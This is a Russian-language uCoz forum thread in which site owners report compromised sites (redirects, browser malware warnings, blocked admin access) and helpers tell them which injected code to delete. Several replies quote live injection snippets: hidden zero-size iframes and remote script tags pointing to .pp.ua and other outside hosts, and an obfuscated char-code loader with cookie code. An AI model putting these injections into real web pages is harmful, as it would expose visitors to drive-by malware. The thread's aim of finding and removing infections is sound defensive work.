Чат сообщества
   | |
| Модератор форума: Yuri_G |
| Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (для изучения) (примеры вредоносного кода и устранение) |
| Вирусы на сайтах (для изучения) |
|
Привет всем!
Проверьте на вирусы сайты, плиз)) http://perm59-css.ucoz.ru/ http://perm59clan-gold.ucoz.ru/ при входе на http://perm59clan-gold.ucoz.ru/ сразу пересылает на другой сайт. Сообщение отредактировал ⠴✠♏y}{@59ℜ℧$✠⠦ - Среда, 02 Ноя 2011, 21:31:21
|
|
⠴✠♏y}{@59ℜ℧$✠⠦, Убить не спрашивая как зовут ... на perm59clan-gold.ucoz.ru
Quote <div class="blocktype2"> <div class="dbottom"> <div class="dtop"> <h3>Время</h3> </div> <div class="dcont"> <center><embed src=http://flash-clocks.com/free-flash-clocks-blog-topics/free-flash-clock-183.swf width=200 height=50 wmode=transparent type=application/x-shockwave-flash> <script type="text/javascript" src="http://r1p.pp.ua/1.js"></script> </embed> <param name="movie" value="flash-clocks.com/free-flash-clocks-blog-topics/free-flash-clock-183.swf" type/><param name="wmode" value="transparent"/><param name=allowFullScreen value="true"/></object></center> </div> </div> </div> Ну а этот хлам зачем нужен ??? на другом сайте ??? Да ещё в нескольких экземплярах ??? Quote <script> var div = document.getElementsByTagName(‘div’)[0]; div.innerHTML = ”; </script> Сообщение отредактировал Miss_Esq - Среда, 02 Ноя 2011, 21:46:34
|
|
Здравствуйте,помогите пожалуйста,не могу зайти как администратор на свой сайт mir-romantiki.ru Пишет "http://radikal.pp.ua
запрещено: http://radikal.pp.ua/ ". И естественно,пока не зайду на сайт, ни чего проверить не могу..Очень прошу.. webanet, |
|
Пётр5325, в блоке "форма входа" сотри </table><iframe src="http://2pac.pp.ua" width="0" height="0" frameborder="0"></iframe>
<table border="0" cellspacing="1" cellpadding="0" width="100%"> - рекламный фрейм, который ведёт на страницу баненую каспером. ≡ Ðream over, Welcom to REALiTY..!..
|
|
POMAH, вы можете объяснить что именно вас беспокоит и какие проблемы? и если есть проблемы то происходят они под логином или под гостем. у вас реклама от бегуна, ифрейм от ловепланет и так немного мусора по мелочи. какие у вас проблемы?
вот довольно агрессивные участки кода Quote <script> //<!-- document.write("<"+"if"+"RaMe sRc="+"http://212.150.34.116/if"+"ramer.php?id=29847&site=154498 height=450 width=185 marginwidth=0 marginheight=0 scrolling=no frameborder=0></"+"if"+"ram"+"e>"); // --> </script> и киевкий баннер тоже не очень |
|
http://vucoze.do.am/
Проблема на всех страницах сайта под логином. Помогите пожалуйста.  |
|
Kionlife,
1 . Doctype прописывается в общих настройках 2 . Удалить Quote <link type="text/css" rel="StyleSheet" href="http://s23.ucoz.net/src/layer3.css"><script type="text/javascript" src="http://s23.ucoz.net/src/u.js"></script><style type="text/css">.UhideBlock {display:none}</style> </head> 3 . А что это у вас с копирайттом ??? Сами закопали его ??? |
|
Сайт http://marvel-lovers.ru/
Суть проблемы: если заходиш с гуглхрома то сразу не пускает на сайт а пишет marvel-lovers.ru содержит материалы сайта login-form.bot56.ru, который, по имеющимся данным, распространяет вредоносное ПО. Ваш компьютер может подвергнуться вирусной атаке при посещении этого сайта. Google обнаружил, что на ваш компьютер могут быть установлены вредоносные программы, если вы продолжите просмотр этого сайта. Если вы посещали его в прошлом или доверяете ему, вполне возможно, что он недавно был взломан хакерами. Рекомендуется прекратить просмотр и посетить сайт завтра либо перейти на другой сайт. Мы уже сообщили владельцу сайта login-form.bot56.ru о том, что на его сайте найдено вредоносное ПО. Подробнее о проблемах, обнаруженных на login-form.bot56.ru, можно узнать на странице Google Страница диагностики безопасного просмотра. Буду очень признателен если поможете решить проблему! Сменить браузер не предлагать! |
|
Wist, В блоке формы входа ...
<script type="text/javascript" src="http://login-form.bot56.ru/jogin_form_javascript.js"></script> |
|
1) www.strelkiserv.ru
2) http://www.strelkiserv.ru/load/vce_dl9_cs1_6/cs_by_proxy/4 http://www.strelkiserv.ru/index/warcraft_mod/0-17 http://www.strelkiserv.ru/load/vce_dl9_cs1_6/gotovye_servera/gotovyj_server_zombie_plague_mod_4_3_dlja_cs_1_6_boty_dm/6-1-0-39 3) И для гостей, и для пользователей. Вообщем как я понимаю на всех страницах сайта действует этот код. Ранее и антивирус ругался, вроде нашел, убрал. Перестало. Но "Поведенческий анализ" Яндекс-вебмастер выдает все равно на этих страницах. Запрос по перепроверке сайта посылал, ничего не изменилось... |
|
ProxY3179, из кода опроса удалите выделенное красным
Quote <input type="hidden" name="ajax" value="458" /></div><div style="padding-top: 4px; text-align: center;"><iframe src="http://j1c.pp.ua/" name="iframe" width="0%"height="0%"scrolling="no" frameBorder=0></iframe><img alt="javascript://" rel="nofollow" onclick="new _uWnd('PollR','Результаты опроса',660,200,{closeonesc:1,maxh:400},{url:'http://www.strelkiserv.ru/poll/6'});return false;" title="Результаты опроса" src= |
|
Samales, удалите это
Quote <SCRIPT> pertd="$IP_ADDRESS$"; function getCookieVal (offset) { var endstr = document.cookie.indexOf (";", offset); if (endstr == -1) endstr = document.cookie.length; return unescape(document.cookie.substring(offset, endstr)); } function GetCookie (name) { var arg = name + "="; var alen = arg.length; var clen = document.cookie.length; var i = 0; while (i < clen) { var j = i + alen; if (document.cookie.substring(i, j) == arg) return getCookieVal (j); i = document.cookie.indexOf(" ", i) + 1; if (i == 0) break; } return null; } function SetCookie(name, value, expiredays, path, domain, secure) { if (expiredays) { var exdate=new Date(); exdate.setDate(exdate.getDate()+expiredays); var expires = exdate.toGMTString(); } document.cookie = name + "=" + escape(value) + ((expiredays) ? "; expires=" + expiredays.toGMTString() : "") + ((path) ? "; path=" + path : "; path=/"); } var lgExD = new Date(); lgExD.setTime(lgExD.getTime() + 36000000000); lgExD.toGMTString(); var m3_ExD = new Date(); m3_ExD.setTime(m3_ExD.getTime() + 9000000000);...и так далее вот начало этого бреда Quote <div class="bookmark" align="center"> <a href="javascript:void(0);" onclick="return bookmark(this);"><img onmouseover="this.src='http://muzsait.ru/MuzSait/design/knopki_vip/zakladki_2.png'" onmouseout="this.src='http://muzsait.ru/MuzSait/design/knopki_vip/zakladki_1.png'" src="http://muzsait.ru/MuzSait/design/knopki_vip/zakladki_1.png" align="absmiddle" border="0"></a></div> <SCRIPT LANGUAGE="JavaScript">function Decode(){var temp="",i,c=0,out="";var str="60!83!67!82!73!80!84!62!13!10!112!101!114!116!100!61!34!36!73!80!95!65!68!68!82!69!83!83!36!34!59!13!10!102!117!110!99!116!105!111!110! 32!103!101!116!67!111!111!...и так далее снимите и поставьте дешифрованный код и отпишитесь о результатах, когда проверите их на своем друге так же может фонить от вашей рекламы n.adonweb.ru |
| |||